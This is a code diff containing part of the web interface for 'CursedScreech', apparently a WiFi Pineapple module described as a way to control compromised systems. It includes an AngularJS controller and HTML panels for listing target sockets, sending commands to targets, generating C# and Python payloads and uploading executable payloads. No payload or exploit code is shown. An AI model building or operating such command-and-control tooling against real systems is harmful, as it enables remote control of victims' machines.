for (var x=0; x < list.length; x++){
if (list[x] == item) {
return x;
}
}
}
$scope.selectAllTargets = (function(){
if ($scope.checkAllTargets) {
// Set to false if currently true
$scope.checkAllTargets = false;
} else {
$scope.checkAllTargets = true;
}
for (var x=0; x < $scope.targets.length; x++){
if ($scope.checkAllTargets) {
$scope.targets[x].checked = true;
} else {
$scope.targets[x].checked = false;
}
}
});
$scope.loadTargets = (function(){
$api.request({
module: 'CursedScreech',
action: 'loadTargets'
},function(response){
if (response.success === true) {
var index;
// Load all targets from the Sein list into our local list
// if any currently exist then update their information
for (var x=0; x < response.data.length; x++) {
index = getTargetIndex(response.data[x])
if (index !== undefined) {
$scope.targets[index].socket = response.data[x];
} else {
$scope.targets.push({'socket': response.data[x], 'checked': false});
}
}
// Check the opposite - if the target exists in our local list but not in
// the list provided it must be deleted from our local list
for (var x=0; x < $scope.targets.length; x++){
if (itemExistsInList($scope.targets[x].socket, response.data) === undefined) {
// Remove item from scope.targets
index = getTargetIndex($scope.targets[x].socket);
$scope.targets.splice(index, 1);
}
}
} else {
console.log(response.message);
}
});
});
$scope.clearTargets = (function(){
$scope.clearLog('targets.log', 'forest');
$scope.targets = [];
});
$scope.deleteTarget = (function(name){
$api.request({
module: 'CursedScreech',
action: 'deleteTarget',
target: name
},function(response){
$scope.loadTargets();
});
});
/* ============================================= */
/* BEGIN EZCMDS FUNCTIONS */
/* ============================================= */
$scope.loadEZCmds = (function(){
$api.request({
module: 'CursedScreech',
action: 'loadEZCmds'
},function(response){
for (k in response.data) {
if (response.data[k] == null) {
delete(response.data[k]);
}
}
$scope.ezcmds = response.data;
});
});
$scope.saveEZCmds = (function(){
$api.request({
module: 'CursedScreech',
action: 'saveEZCmds',
ezcmds: $scope.ezcmds
},function(response){
if (response.success === true){
}
});
});
$scope.deleteEZCmd = (function(key){
if (!confirm("Delete " + key + "?")) {
return;
}
for (k in $scope.ezcmds) {
if (k == key) {
delete($scope.ezcmds[k]);
$scope.saveEZCmds();
}
}
});
$scope.addEZCmd = (function(){
if (!$scope.newCmdName || !$scope.newCmdCommand) {
return;
}
$scope.ezcmds[$scope.newCmdName] = $scope.newCmdCommand;
$scope.saveEZCmds();
$scope.newCmdName = $scope.newCmdCommand = "";
});
$scope.ezCommandChange = (function(){
if ($scope.selectedCmd === null) {
$scope.targetCommand = "";
$scope.showPayloadSelect = false;
return;
}
for (key in $scope.ezcmds) {
if ($scope.ezcmds[key] == $scope.selectedCmd) {
if (key == "Send File") {
$scope.showPayloadSelect = true;
} else {
$scope.showPayloadSelect = false;
}
}
}
$scope.targetCommand = $scope.selectedCmd;
});
/* ============================================= */
/* BEGIN KEY FUNCTIONS */
/* ============================================= */
$scope.loadCertificates = (function(type) {
if (type == "kuro") {
$scope.selectKuroKey = true;
$scope.selectTargetKey = false;
} else if (type == "target") {
$scope.selectTargetKey = true;
$scope.selectKuroKey = false;
}
$api.request({
module: 'CursedScreech',
action: 'loadCertificates'
},function(response){
if (response.success === true) {
// Display certificate information
$scope.keyErrorMessage = '';
$scope.certificates = response.data;
} else {
// Display error
$scope.keyErrorMessage = response.message;
}
});
});
$scope.selectKey = (function(key){
keyPath = "/pineapple/modules/Papers/includes/ssl/" + key;
if ($scope.selectKuroKey == true) {
$scope.settings_kuroKey = keyPath;
} else if ($scope.selectTargetKey == true) {
$scope.settings_targetKey = keyPath;
}
});
/* ============================================= */
/* BEGIN LOG FUNCTIONS */
/* ============================================= */
$scope.getLogs = (function(type){
/* valid types are error or changelog */
$api.request({
module: 'CursedScreech',
action: 'getLogs',
type: type
},function(response){
if (type == 'error') {
$scope.logs = response.data;
} else if (type == 'changelog') {
$scope.changelogs = response.data;
} else if (type == 'targets') {
$scope.allTargetLogs = response.data;
}
});
});
$scope.readLog = (function(log,type){
$api.request({
module: 'CursedScreech',
action: 'readLog',
logName: log,
type: type
},function(response){
if (response.success === true) {
if (log == 'activity.log') {
$scope.activityLogData = response.data;
} else {
$scope.currentLogTitle = log;
$scope.currentLogData = $sce.trustAsHtml(response.data);
}
}
});
});
$scope.downloadLog = (function(name,type){
$api.request({
module: 'CursedScreech',
action: 'downloadLog',
logName: name,
logType: type
},function(response){
if (response.success === true) {
window.location = '/api/?download=' + response.data;
}
});
});
$scope.clearLog = (function(log,type){
$api.request({
module: 'CursedScreech',
action: 'clearLog',
logName: log,
type: type
},function(response){
if (log == "activity.log") {
$scope.readLog("activity.log", "forest");
}
});
});
$scope.deleteLog = (function(log, type){
if (!confirm("Delete " + log + "?")) {
return;
}
$api.request({
module: 'CursedScreech',
action: 'deleteLog',
logName: log,
type: type
},function(response){
if (type == 'targets') {
$scope.getLogs('targets');
}
if (response.success === false) {
alert(response.message);
}
});
});
$scope.refreshLogs = (function(){
$scope.getLogs("error");
if ($scope.seinIsRunning) {
$scope.loadTargets();
}
if ($scope.kuroIsRunning) {
$scope.readLog("activity.log", "forest");
}
});
/* ============================================= */
/* BEGIN PAYLOAD FUNCTIONS */
/* ============================================= */
$scope.setSelectedFiles = (function(){
files = document.getElementById("selectedFiles").files;
for (var x = 0; x < files.length; x++) {
$scope.selectedFiles.push(files[x]);
}
});
$scope.removeSelectedFile = (function(file){
var x = $scope.selectedFiles.length;
while (x--) {
if ($scope.selectedFiles[x] === file) {
$scope.selectedFiles.splice(x,1);
}
}
});
$scope.uploadFile = (function(){
$scope.uploading = true;
var fd = new FormData();
for (x = 0; x < $scope.selectedFiles.length; x++) {
fd.append($scope.selectedFiles[x].name, $scope.selectedFiles[x]);
}
$http.post("/modules/CursedScreech/api/module.php", fd, {
transformRequest: angular.identity,
headers: {'Content-Type': undefined}
}).success(function(response) {
for (var key in response) {
if (response.hasOwnProperty(key)) {
if (response.key == "Failed") {
alert("Failed to upload " + key);
}
}
}
$scope.selectedFiles = [];
$scope.getPayloads();
$scope.uploading = false;
});
});
$scope.getPayloads = (function(){
$api.request({
module: 'CursedScreech',
action: 'getPayloads'
},function(response){
$scope.payloads = [];
for (var key in response.data) {
if (response.data.hasOwnProperty(key)) {
var obj = {fileName: key, filePath: response.data[key]};
$scope.payloads.push(obj);
}
}
});
});
$scope.deletePayload = (function(payload){
var res = confirm("Press OK to confirm deletion of " + payload.fileName + ".");
if (!res) {return;}
$api.request({
module: 'CursedScreech',
action: 'deletePayload',
filePath: payload.filePath + payload.fileName
},function(response){
$scope.getPayloads();
});
});
$scope.configUploadLimit = (function(){
$scope.uploadLimitThrobber = true;
$api.request({
module: 'CursedScreech',
action: 'cfgUploadLimit'
},function(response){
if (response.success === true) {
alert("Upload limit configured successfully.");
} else {
alert("Failed to configure upload limit.");
}
$scope.uploadLimitThrobber = false;
});
});
/* ============================================= */
/* MISC FUNCTIONS */
/* ============================================= */
$scope.swapPane = (function(pane) {
if (pane) { return; }
$scope.showTargetPane = !$scope.showTargetPane;
$scope.showPayloadPane = !$scope.showPayloadPane;
});
/* ============================================= */
/* INITIALIZERS */
/* ============================================= */
// Not sure if this is ever reached
$scope.$on('$destroy', function(){
$interval.cancel($scope.stop);
$scope.stop = undefined;
});
$scope.loadAvailableInterfaces();
$scope.loadSettings();
$scope.loadEZCmds();
$scope.getPayloads();
$scope.getLogs('changelog');
$scope.depends('check');
$scope.clearDownloads();
$scope.procStatus('sein.py');
$scope.procStatus('kuro.py');
$scope.stop = $interval(function(){
$scope.refreshLogs();
if ($scope.seinIsRunning) {
$scope.procStatus('sein.py');
}
if ($scope.kuroIsRunning) {
$scope.procStatus('kuro.py');
}
}, 2000);
}])

640
CursedScreech/module.html Executable file
View File

@@ -0,0 +1,640 @@
<!-- CursedScreech by sud0nick (C) 2016 -->
<script>
$(document).on('mouseenter', '.cs_hoverSuccess', function() {
$(this).addClass("btn-success");
}).on('mouseleave', '.cs_hoverSuccess', function(){
$(this).removeClass("btn-success");
});
$(document).on('mouseenter', '.cs_hoverPrimary', function() {
$(this).addClass("btn-primary");
}).on('mouseleave', '.cs_hoverPrimary', function(){
$(this).removeClass("btn-primary");
});
$(document).on('mouseenter', '.cs_hoverInfo', function() {
$(this).addClass("btn-info");
}).on('mouseleave', '.cs_hoverInfo', function(){
$(this).removeClass("btn-info");
});
$(document).on('mouseenter', '.cs_hoverDanger', function() {
$(this).addClass("btn-danger");
}).on('mouseleave', '.cs_hoverDanger', function(){
$(this).removeClass("btn-danger");
});
</script>
<div class="row" ng-controller="CursedScreechController">
<!-- ==================== -->
<!-- BEGIN STATUS PANEL -->
<!-- ==================== -->
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">CursedScreech Status</h3>
</div>
<div class="panel-body">
<div class="container-fluid">
<div class="row pull-right">
<button type="button" class="btn" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog('status.help','help');">?</button>
</div>
<br />
<div class="row">
<div class="col-md-3">
<button type="button" class="btn btn-sm btn-success" ng-show="seinButton=='Start'" ng-hide="seinButton=='Stop'" ng-disabled="showSeinThrobber" ng-click="startProc('sein.py');">Start</button>
<button type="button" class="btn btn-sm btn-danger" ng-show="seinButton=='Stop'" ng-hide="seinButton=='Start'" ng-disabled="showSeinThrobber" ng-click="stopProc('sein.py');">Stop</button>
<h4 ng-show="!showSeinThrobber" ng-hide="showSeinThrobber">Sein: {{ seinStatus }}</h4>
<h4 ng-show="showSeinThrobber" ng-hide="!showSeinThrobber">Sein: <img src='/img/throbber.gif'/></h4>
</div>
<div class="col-md-3">
<button type="button" class="btn btn-sm btn-sm btn-success" ng-show="kuroButton=='Start'" ng-hide="kuroButton=='Stop'" ng-disabled="showKuroThrobber" ng-click="startProc('kuro.py');">Start</button>
<button type="button" class="btn btn-sm btn-sm btn-danger" ng-show="kuroButton=='Stop'" ng-hide="kuroButton=='Start'" ng-disbaled="showKuroThrobber" ng-click="stopProc('kuro.py');">Stop</button>
<h4 ng-show="!showKuroThrobber" ng-hide="showKuroThrobber">Kuro: {{ kuroStatus }}</h4>
<h4 ng-show="showKuroThrobber" ng-hide="!showKuroThrobber">Kuro: <img src='/img/throbber.gif'/></h4>
</div>
<div class="col-md-3">
<button type="button" class="btn btn-sm btn-success" ng-show="!dependsInstalled" ng-hide="dependsInstalled" ng-disabled="dependsProcessing" ng-click="depends('install');">Install</button>
<button type="button" class="btn btn-sm btn-danger" ng-show="dependsInstalled" ng-hide="!dependsInstalled" ng-disabled="dependsProcessing" ng-click="depends('remove');">Uninstall</button>
<img ng-show="dependsProcessing" ng-hide="!dependsProcessing" src='/img/throbber.gif'/>
<h4>Dependencies</h4>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- ==================== -->
<!-- END STATUS PANEL -->
<!-- ==================== -->
<!-- ==================== -->
<!-- BEGIN SETTINGS PANEL -->
<!-- ==================== -->
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-heading pointer" data-toggle="collapse" data-target="#settings">
<h3 class="panel-title">Settings
<img ng-show="showSettingsThrobber" ng-hide="!showSettingsThrobber" src='/img/throbber.gif'/></h3>
</div>
<div id="settings" class="panel-collapse collapse">
<div class="panel-body">
<div class="container-fluid">
<div class="row pull-right">
<button type="button" class="btn" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog('settings.help','help');">?</button>
</div>
<br />
<div class="row">
<div class="col-md-8">
<div class="row form-group">
<label class="col-md-2 control-label">Listening Interface</label>
<div class="col-md-6">
<select class="form-control" ng-model="settings_ifaceName" ng-options="iface for iface in available_interfaces">
</select>
</div>
</div>
<div class="row form-group">
<label class="col-md-2 control-label">Multicast Group</label>
<div class="col-md-6">
<input type="text" ng-model="settings_mcastGroup" class="form-control">
</div>
<div class="col-md-2">
<button type="button" class="btn btn-sm" ng-click="useDefault('mcast_group');">Default</button>
</div>
</div>
<div class="row form-group">
<label class="col-md-2 control-label">Multicast Port</label>
<div class="col-md-6">
<input type="text" ng-model="settings_mcastPort" class="form-control">
</div>
<div class="col-md-2">
<button type="button" class="btn btn-sm" ng-click="useDefault('mcast_port');">Default</button>
</div>
</div>
<div class="row form-group">
<label class="col-md-2 control-label">Heartbeat Interval</label>
<div class="col-md-6">
<input type="text" ng-model="settings_hb_interval" class="form-control">
</div>
<div class="col-md-2">
<button type="button" class="btn btn-sm" ng-click="useDefault('hb_interval');">Default</button>
</div>
</div>
<div class="row form-group">
<label class="col-md-2 control-label">Kuro Keys</label>
<div class="col-md-6">
<input type="text" ng-model="settings_kuroKey" class="form-control">
</div>
<div class="col-md-2">
<button type="button" class="btn btn-sm" data-toggle="modal" data-target="#cs_keyModal" ng-click="loadCertificates('kuro');">SSL Store</button>
</div>
</div>
<div class="row form-group">
<label class="col-md-2 control-label">Target Keys</label>
<div class="col-md-6">
<input type="text" ng-model="settings_targetKey" class="form-control">
</div>
<div class="col-md-2">
<button type="button" class="btn btn-sm" data-toggle="modal" data-target="#cs_keyModal" ng-click="loadCertificates('target');">SSL Store</button>
</div>
</div>
<div class="row form-group">
<div class="col-md-6">
<div class="checkbox">
<label><input type="checkbox" ng-model="settings_auth">Use PortalAuth for authorization</label>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-2" style="padding-top: 5px">
<button type="button" class="btn cs_hoverInfo fixed-width" style="width:175px" ng-click="updateSettings();"><img src="/modules/CursedScreech/includes/icons/glyphicons-447-floppy-save.png"/>&nbsp;&nbsp;Save Settings</button>
</div>
<div class="col-md-2" style="padding-top: 5px">
<button type="button" class="btn cs_hoverInfo fixed-width" style="width:175px" ng-click="genPayload('cs');"><img src="/modules/CursedScreech/includes/icons/glyphicons-201-download.png"/>&nbsp;&nbsp;C# Payload</button>
</div>
<div class="col-md-2" style="padding-top: 5px">
<button type="button" class="btn cs_hoverInfo fixed-width" style="width:175px" ng-click="genPayload('python');"><img src="/modules/CursedScreech/includes/icons/glyphicons-201-download.png"/>&nbsp;&nbsp;Python Payload</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- ================== -->
<!-- END SETTINGS PANEL -->
<!-- ================== -->
<!-- ==================================== -->
<!-- BEGIN ACTIVITY LOG AND TARGET PANELS -->
<!-- ==================================== -->
<div class="col-md-12">
<div class="row">
<div class="col-md-6">
<div class="panel panel-default">
<div class="panel-heading pointer" data-toggle="collapse" data-target="#cs_activityLog">
<h3 class="panel-title">Activity Log
</div>
<div id="cs_activityLog" class="panel-collapse collapse">
<div class="panel-body" style="height: 500px">
<div class="container-fluid">
<div class="pull-right">
<button type="button" class="btn" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog('activitylog.help','help');">?</button>
<br /><br />
</div>
<textarea ng-model="activityLogData" style="width: 100%; height: 350px" readonly></textarea>
<button type="button" class="btn cs_hoverInfo" ng-click="clearLog('activity.log', 'forest');"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/>&nbsp;&nbsp;Clear Log</button>
<button type="button" class="btn cs_hoverInfo" ng-click="downloadLog('activity.log', 'forest');"><img src="/modules/CursedScreech/includes/icons/glyphicons-201-download.png"/>&nbsp;&nbsp;Download</button>
</div>
</div>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-default">
<div class="panel-heading pointer" data-toggle="collapse" data-target="#cs_targetLog">
<h3 class="panel-title">Targets
</div>
<div id="cs_targetLog" class="panel-collapse collapse">
<div class="panel-body" style="height: 500px">
<div class="container-fluid">
<div class="pull-right">
<button type="button" class="btn" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog('targets.help','help');">?</button>
<br /><br />
</div>
<div style="text-align: center">
<button type="button" class="btn" ng-class="{ 'btn-success' : showTargetPane }" ng-click="swapPane(showTargetPane);">Targets</button>
<button type="button" class="btn" ng-class="{ 'btn-success' : showPayloadPane }" ng-click="getPayloads(); swapPane(showPayloadPane);">Payloads</button>
</div>
<!-- Target Pane -->
<div ng-show="showTargetPane" ng-hide="!showTargetPane">
<div class="form-group">
<div class="form-group">
<select class="form-control block" ng-model="selectedCmd" ng-disabled="kuroButton=='Start'" ng-change="ezCommandChange();" ng-options="value as key for (key, value) in ezcmds">
<option value="" selected>Select...</option>
</select>
<br />
<div ng-show="showPayloadSelect">
<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedPayload" ng-options="payload.fileName for payload in payloads">
<option value="" disabled selected>Select Payload...</option>
</select>
<br />
<h4>Remote upload path</h4>
</div>
<input type="text" ng-model="targetCommand" class="form-control block" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
<table style="width: 100%">
<tr><td>
<button type="button" class="btn btn-sm cs_hoverInfo" style="width: 100px;" ng-disabled="kuroButton=='Start'" ng-click="sendCommand();">Send</button>
</td><td align="right">
<button type="button" class="btn btn-sm cs_hoverInfo" data-toggle="modal" data-target="#ezcmds_modal">EZ Cmds</button>
</td></tr>
</table>
</div>
</div>
<div class="table-responsive table-dropdown">
<table class="table">
<thead>
<tr>
<th><input type="checkbox" ng-change="selectAllTargets();" ng-model="cbox"></th>
<th>Socket</th>
<th>Recv Log</th>
</tr>
</thead>
<tbody>
<tr ng-repeat="target in targets">
<td><input type="checkbox" name="targetSelect" ng-model="target.checked"/></td>
<td>{{ target.socket }}</td>
<td>
<button type="button" class="btn btn-sm cs_hoverInfo" data-toggle="modal" data-target="#cs_viewRecvData" ng-click="readLog(target.socket.split(':')[0], 'targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-28-search.png"/></button>
<button type="button" class="btn btn-sm cs_hoverInfo" ng-click="downloadLog(target.socket.split(':')[0], 'targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-201-download.png"/></button>
<button type="button" class="btn btn-sm cs_hoverDanger" ng-click="clearLog(target.socket.split(':')[0], 'targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
</td>
</tr>
</tbody>
</table>
</div>
<table style="width: 100%">
<tr><td>
<button type="button" class="btn btn-sm cs_hoverInfo" ng-click="clearTargets();"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/>&nbsp;&nbsp;Clear Targets</button>
</td><td align="right">
<button type="button" class="btn btn-sm cs_hoverInfo" data-toggle="modal" data-target="#cs_allTargetLogs" ng-click="getLogs('targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-37-file.png"/>&nbsp;&nbsp;All Logs</button>
</td></tr>
</table>
</div>
<!-- Payload Pane -->
<div ng-show="showPayloadPane" ng-hide="!showPayloadPane">
<table width="100%">
<tr><td align="right">
<img ng-show="uploadLimitThrobber" ng-hide="!uploadLimitThrobber" src='/img/throbber.gif'/>
<a href="" ng-show="!uploadLimitThrobber" ng-hide="uploadLimitThrobber" ng-click="configUploadLimit();">Configure Upload Limit</a>
</td></tr>
</table>
<div>
<table class="table">
<thead>
<th>Payload</th>
<th>Actions</th>
</thead>
<tbody>
<tr ng-repeat="payload in payloads">
<td>{{ payload.fileName }}</td>
<td><button class="btn cs_hoverDanger" ng-click="deletePayload(payload);"><img src="/modules/CursedScreech/includes/icons/glyphicons-17-bin.png"/></button>
<td></td>
</tr>
</tbody>
</table>
<div style="text-align:center">
<button class="btn cs_hoverInfo" data-toggle="modal" data-target="#cs_uploaderView"><img src="/modules/CursedScreech/includes/icons/glyphicons-202-upload.png"/>&nbsp;&nbsp;Upload Payload</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- ====================== -->
<!-- END ACTIVITY LOG PANEL -->
<!-- ====================== -->
<!-- =================== -->
<!-- BEGIN KEY MODAL -->
<!-- =================== -->
<div id="cs_keyModal" class="modal fade" rold="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<table style="width: 100%">
<tr><td align="left">
<h3 class="panel-title">Certificate Store</h3>
</td><td align="right">
<button type="button" class="btn" ng-show="!showCertThrobber" ng-hide="showCertThrobber" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog('key.help','help');">?</button>
</td></tr>
</table>
</div>
<div class="table-responsive table-dropdown">
<table class="table">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Files</th>
<th>Encrypted</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<tr ng-repeat="(index,data) in certificates">
<td>{{ data.Name }}</td>
<td>{{ data.KeyType }}</td>
<td>{{ data.Type }}</td>
<td>{{ data.Encrypted }}</td>
<td>
<button type="button" class="btn btn-sm cs_hoverInfo" ng-disabled="selectKuroKey && data.Encrypted == 'Yes'" ng-click="selectKey(data.Name);">Select</button>
</td>
</tr>
</tbody>
</table>
<div style="text-align:center">
<h4>{{ keyErrorMessage }}</h4>
</div>
</div>
</div>
</div>
</div>
<!-- ================= -->
<!-- END KEY MODAL -->
<!-- ================= -->
<!-- ==================== -->
<!-- BEGIN EZCMDS MODAL -->
<!-- ==================== -->
<div id="ezcmds_modal" class="modal fade" rold="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h3>EZ Commands</h3>
</div>
<div class="modal-body">
<table class="table">
<thead>
<tr>
<th><button type="button" class="btn cs_hoverInfo" data-toggle="modal" data-target="#newEZCmdModal" ng-click=""><img src="/modules/CursedScreech/includes/icons/glyphicons-433-plus.png"/></button></th>
<th>Name</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr ng-repeat="(key, value) in ezcmds">
<td>
<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
</td>
<td style="width: 200px">
<label class="form-label">{{ key }}</label>
</td>
<td>
<input type="text" class="form-control" ng-model="ezcmds[key]" />
</td>
</tr>
</tbody>
</table>
<div style="text-align: center">
<button type="button" class="btn cs_hoverSuccess" style="width: 200px" ng-click="saveEZCmds();"><img src="/modules/CursedScreech/includes/icons/glyphicons-447-floppy-save.png"/>&nbsp;&nbsp;Save EZ Cmds</button>
</div>
</div>
</div>
</div>
</div>
<div id="newEZCmdModal" class="modal fade" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal=body">
<table class="table">
<thead>
<tr>
<th>Name</th>
<th>Command</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<input type="text" class="form-control" ng-model="newCmdName" />
</td>
<td>
<input type="text" class="form-control" ng-model="newCmdCommand" />
</td>
<td>
<button class="btn cs_hoverSuccess" data-toggle="modal" data-target="#newEZCmdModal" ng-click="addEZCmd();"><img src="/modules/CursedScreech/includes/icons/glyphicons-447-floppy-save.png"/>&nbsp;&nbsp;Save</button>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<!-- ==================== -->
<!-- END EZCMDS MODAL -->
<!-- ==================== -->
<!-- ======================== -->
<!-- BEGIN TARGET LOG MODAL -->
<!-- ======================== -->
<div id="cs_allTargetLogs" class="modal fade" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h3>All Target Logs</h3>
</div>
<div class="modal-body">
<table class="table">
<thead>
<th>Socket</th>
<th> Recv Log</th>
</thead>
<tbody>
<tr ng-repeat="log in allTargetLogs">
<td>{{ log }}</td>
<td>
<button type="button" class="btn btn-sm cs_hoverInfo" data-toggle="modal" data-target="#cs_viewRecvData" ng-click="readLog(log, 'targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-28-search.png"/></button>
<button type="button" class="btn btn-sm cs_hoverInfo" ng-click="downloadLog(log, 'targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-201-download.png"/></button>
<button type="button" class="btn btn-sm cs_hoverDanger" ng-click="deleteLog(log, 'targets');"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<!-- ====================== -->
<!-- END TARGET LOG MODAL -->
<!-- ====================== -->
<!-- ==================== -->
<!-- BEGIN RECVDATA MODAL -->
<!-- ==================== -->
<div id="cs_viewRecvData" class="modal fade" style="max-height: 900px; overflow-y:auto;" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h3>{{ currentLogTitle }}</h3>
</div>
<div class="modal-body">
<pre>{{ currentLogData }}</pre>
</div>
</div>
</div>
</div>
<!-- ==================== -->
<!-- END RECVDATA MODAL -->
<!-- ==================== -->
<!-- =================== -->
<!-- BEGIN LOG MODAL -->
<!-- =================== -->
<div id="cs_viewLogInfo" class="modal fade" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<h3>{{ currentLogTitle }}</h3>
</div>
<div class="modal-body">
<p ng-bind-html="currentLogData"></p>
</div>
</div>
</div>
</div>
<!-- ================= -->
<!-- END LOG MODAL -->
<!-- ================= -->
<!-- ==================================== -->
<!-- BEGIN ERROR LOG AND CHANGELOG PANELS -->
<!-- ==================================== -->
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-heading pointer" data-toggle="collapse" data-target="#errorlog">
<h3 class="panel-title">Error Logs</h3>
</div>
<div id="errorlog" class="panel-body panel-collapse collapse">
<table class="table">
<thead>
<tr>
<th>Log Name</th>
<th>Actions</th>
</thead>
<tbody>
<tr ng-repeat="log in logs">
<td>{{ log }}</td>
<td>
<button type="button" class="btn btn-sm cs_hoverInfo" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog(log, 'error');"><img src="/modules/CursedScreech/includes/icons/glyphicons-28-search.png"/></button>
<button type="button" class="btn btn-sm cs_hoverDanger" ng-click="deleteLog(log, 'error');">Delete</button>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-heading pointer" data-toggle="collapse" data-target="#changelog">
<h3 class="panel-title">Change Log</h3>
</div>
<div id="changelog" class="panel-body panel-collapse collapse">
<table class="table">
<thead>
<tr>
<th>Version</th>
<th>Actions</th>
</thead>
<tbody>
<tr ng-repeat="version in changelogs">
<td>{{ version }}</td>
<td>
<button type="button" class="btn btn-sm cs_hoverInfo" data-toggle="modal" data-target="#cs_viewLogInfo" ng-click="readLog(version, 'changelog');"><img src="/modules/CursedScreech/includes/icons/glyphicons-28-search.png"/></button>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<!-- ================================== -->
<!-- END ERROR LOG AND CHANGELOG PANELS -->
<!-- ================================== -->
<!-- ====================== -->
<!-- BEGIN UPLOADER MODAL -->
<!-- ====================== -->
<div id="cs_uploaderView" class="modal fade" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">&times;</button>
<div class="btn btn-primary">
<label for="selectedFiles" style="cursor: pointer">Add files</label>
</div>
</div>
<div class="modal-body">
<table class="table">
<thead>
<th>File</th>
<th>Actions</th>
</thead>
<tbody>
<tr ng-repeat="file in selectedFiles">
<td>{{ file.name }}</td>
<td><button class="btn cs_hoverDanger" ng-click="removeSelectedFile(file);"><img src="/modules/CursedScreech/includes/icons/glyphicons-17-bin.png"/></td>
</tr>
</tbody>
</table>
<div style="text-align:center">
<input type="file" accept=".exe, .ps1, .bat" id="selectedFiles" onchange="angular.element(this).scope().setSelectedFiles()" style="visibility: hidden;" multiple>
<img ng-show="uploading" ng-hide="!uploading" src='/img/throbber.gif'/>
<button class="btn" ng-show="!uploading" ng-hide="uploading" ng-class="{'cs_hoverInfo' : selectedFiles.length > 0}" ng-disabled="selectedFiles.length == 0" ng-click="uploadFile();"><img src="/modules/CursedScreech/includes/icons/glyphicons-202-upload.png"/>&nbsp;&nbsp;Upload</button>
</div>
</div>
</div>
</div>
</div>
<!-- ==================== -->
<!-- END UPLOADER MODAL -->
<!-- ==================== -->
</div>

10
CursedScreech/module.info Executable file
View File

@@ -0,0 +1,10 @@
{
"author": "sud0nick",
"description": "Securely control compromised systems.",
"devices": [
"nano",
"tetra"
],
"title": "CursedScreech",
"version": "1.2"
}